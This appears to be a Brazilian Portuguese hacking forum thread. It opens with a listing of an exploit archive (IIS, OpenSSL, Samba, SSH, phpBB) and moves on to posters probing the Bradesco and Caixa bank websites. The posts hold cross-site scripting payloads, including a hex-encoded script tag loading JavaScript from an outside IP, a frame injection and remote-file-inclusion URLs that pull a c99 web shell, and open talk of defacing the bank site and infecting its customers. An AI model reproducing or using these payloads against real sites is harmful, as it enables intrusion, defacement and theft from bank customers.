Mensagens

[Top]

http://bismark.extracon.it/exploits/archivio/


Top

AIXFTPD.ZIP   [849 Byte]   
AIXFTPD43.ZIP   [10 KB]   
ARPLHMDGROUPXPLOIT.ZIP   [115 KB]   
ARPLHMDGROUPXPLOIT1.ZIP   [128 KB]   
ARPLHMDGROUPXPLOITAIXFTPD.ZIP   [52 KB]   
ARPLHMDIEBUG.ZIP   [33 KB]   
ARPLHMDIISASPOVERFLOW.ZIP   [34 KB]   
ARPLHMDIISHTROVERFLOW.ZIP   [17 KB]   
ARPLHMDNETCRAFTFINGERPRINT.ZIP   [34 KB]   
ARPLHMDRPCDOS.ZIP   [45 KB]   
ARPLHMDSCRIPTEDITOR.ZIP   [9 KB]   
COPPERMINE_10.ZIP   [814 Byte]   
FOLDEROFWEB.ZIP   [1 KB]   
FP2000.ZIP   [2 KB]   
GETIISSERV.ZIP   [604 Byte]   
IIS5_WEBDAV.ZIP   [908 Byte]   
NS4X.ZIP   [569 Byte]   
NUKEBROWSER.ZIP   [626 Byte]   
OMNIBACK2.ZIP   [440 Byte]   
OPENSSL_TOO_OPEN_OPENFUCK.ZIP   [2 KB]   
OPENSSL_TOO_OPEN_OPENFUCKV2.ZIP   [2 KB]   
OPENSSLTOOOPEN.ZIP   [902 Byte]   
PCANYWHERE.ZIP   [583 Byte]   
PHPBB2.ZIP   [7 KB]   
PHPNUKE.ZIP   [3 KB]   
PHPWEBSITE.ZIP   [4 KB]   
RDS.ZIP   [2 KB]   
SAMBA_22X.ZIP   [2 KB]   
SCOPOP3.ZIP   [422 Byte]   
SSH199OPENSSH3X.ZIP   [2 KB]   
TELNETDSUNOS5X.ZIP   [1 KB]   
UNICODE.ZIP   [743 Byte]   
UWI2.ZIP   [1 KB]   
WURM4.ZIP   [909 Byte]   
X6.ZIP   [663 Byte]   
YABBSE.ZIP   [3 KB]   



Tao tudo ai e muito mais ... xD

 

Ops esquecie de finalizar,
E dentro do http://213.3.7.111/1.js tem esse pequeno comando.
location.replace('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe');
onde faz baixar o putty.exe
^^

Explica mais o Zé Bunda.

ele so transformo o string ">
em Hex
que deu esse rezutado:
22 3E 3C 73 63 72 69 70 74 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 32 31 33 2E 33 2E 37 2E 31 31 31 2F 31 2E 6A 73 22 3E 3C 2F 73 63 72 69 70 74 3E
e coloco os _22_3E_ e assim por diante..

Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h='\\

Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:

Código Selecionar Expandir

<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH

E isso eu reparei agora.. mais os adiministrador do banco era pra ter mais responsabilidade  pq caso um site desse seja invadido o hacker mal intencionado   pode por um auto infect na tela principal e infectar varios cliente e com isso tendo acesso as conta bancrias...

desculpe tive que apagar pq o deface vai ser meu xD

Melhor fazer spam ou um deface?
http://www.bradesco.com.br/indexpf.phtm ... config.php?
vaikarai info
Hacker banker

http://www.bradesco.com.br/indexpf.phtm ... om/c99.txt?
:/

@ vaikarai

cara, com certeza a caixa não usa cookies no internetbanking xD
outra coisa...o que vai ter de logs de vc passando nessus no site.... =x

Ei eu nao passei o Nessus no site nao..
Tava so dando uma olhada em outra parada aki.
:/

http://img131.imageshack.us/img131/7456 ... ndono6.jpg

essa foi  incompetência pesada mesmo, olha só o perigo:

[ depois de ver a fundo.. decidi não me envolver nisso. ]

Vixi .. ai ta um perigo grande xD

http://www1.caixa.gov.br/busca/asp/resu ... arai-info')%3C/script%3E
 
Tava dando uma estudade em XSS e vie que o site da Caixa Econômica Federal deve estar vulneravel.